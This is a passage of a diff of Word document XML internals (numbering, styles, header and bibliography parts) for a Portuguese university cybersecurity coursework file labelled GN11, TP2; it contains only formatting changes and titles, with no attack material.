xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Header"/>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+    </w:pPr>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+      <w:t>ISEL</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+      <w:t>-MEIC</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+      <w:t>-SI (2025/2026)</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+      <w:t xml:space="preserve"> – </w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+      <w:t xml:space="preserve">CS - </w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="pt-PT"/>
+      </w:rPr>
+      <w:t>GN11</w:t>
+    </w:r>
+  </w:p>
+</w:hdr>
+</file>
+
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="10BD581F"/>
+    <w:nsid w:val="10B81914"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="E7DA50BC"/>
+    <w:tmpl w:val="78DAC1EA"/>
     <w:lvl w:ilvl="0" w:tplc="08090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1080" w:hanging="360"/>
+        <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -2770,7 +5918,7 @@
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1800" w:hanging="360"/>
+        <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
@@ -2782,7 +5930,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2520" w:hanging="360"/>
+        <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -2794,7 +5942,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3240" w:hanging="360"/>
+        <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -2806,7 +5954,7 @@
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3960" w:hanging="360"/>
+        <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
@@ -2818,7 +5966,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="4680" w:hanging="360"/>
+        <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -2830,7 +5978,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="5400" w:hanging="360"/>
+        <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -2842,7 +5990,7 @@
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="6120" w:hanging="360"/>
+        <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
@@ -2854,7 +6002,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="6840" w:hanging="360"/>
+        <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -2862,16 +6010,16 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="2E0E0C36"/>
+    <w:nsid w:val="10BD581F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="45D0D042"/>
+    <w:tmpl w:val="E7DA50BC"/>
     <w:lvl w:ilvl="0" w:tplc="08090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
+        <w:ind w:left="1080" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -2883,7 +6031,7 @@
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
+        <w:ind w:left="1800" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
@@ -2895,7 +6043,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2160" w:hanging="360"/>
+        <w:ind w:left="2520" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -2907,7 +6055,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
+        <w:ind w:left="3240" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -2919,7 +6067,7 @@
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
+        <w:ind w:left="3960" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
@@ -2931,7 +6079,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="4320" w:hanging="360"/>
+        <w:ind w:left="4680" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -2943,7 +6091,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
+        <w:ind w:left="5400" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
@@ -2955,7 +6103,7 @@
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
+        <w:ind w:left="6120" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
@@ -2967,7 +6115,7 @@
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="6480" w:hanging="360"/>
+        <w:ind w:left="6840" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
@@ -2975,6 +6123,232 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1E9C72C0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="212E6CEA"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2E0E0C36"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="45D0D042"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="321228C0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -3096,13 +6470,19 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="415831203">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="700980505">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1234974110">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="258218542">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="700980505">
+  <w:num w:numId="5" w16cid:durableId="924727896">
     <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:num w:numId="3" w16cid:durableId="1234974110">
-    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3556,7 +6936,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="004E2FCB"/>
@@ -3762,7 +7141,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading3"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="004E2FCB"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
@@ -4038,6 +7416,130 @@
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="007E22A0"/>
+    <w:rPr>
+      <w:color w:val="467886" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="007E22A0"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOCHeading">
+    <w:name w:val="TOC Heading"/>
+    <w:basedOn w:val="Heading1"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="004408CB"/>
+    <w:pPr>
+      <w:spacing w:before="240" w:after="0"/>
+      <w:outlineLvl w:val="9"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+      <w:lang w:eastAsia="en-GB"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC1">
+    <w:name w:val="toc 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004408CB"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004408CB"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004408CB"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004408CB"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4252"/>
+        <w:tab w:val="right" w:pos="8504"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="004408CB"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004408CB"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4252"/>
+        <w:tab w:val="right" w:pos="8504"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="004408CB"/>
   </w:style>
 </w:styles>
 </file>
@@ -4335,4 +7837,16 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F3A1F306-132D-4081-A676-BC6BE2B00500}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/TP2/GN11_TP2.docx
+++ b/TP2/GN11_TP2.docx
@@ -10,14 +10,12 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>Cibersegurança</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -49,19 +47,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">rabalho do módulo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>2, parte 1 e 2</w:t>
+        <w:t>Trabalho do módulo 2, parte 1 e 2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -329,6 +315,14 @@
     </w:p>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
         <w:id w:val="-724286656"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
@@ -337,14 +331,8 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
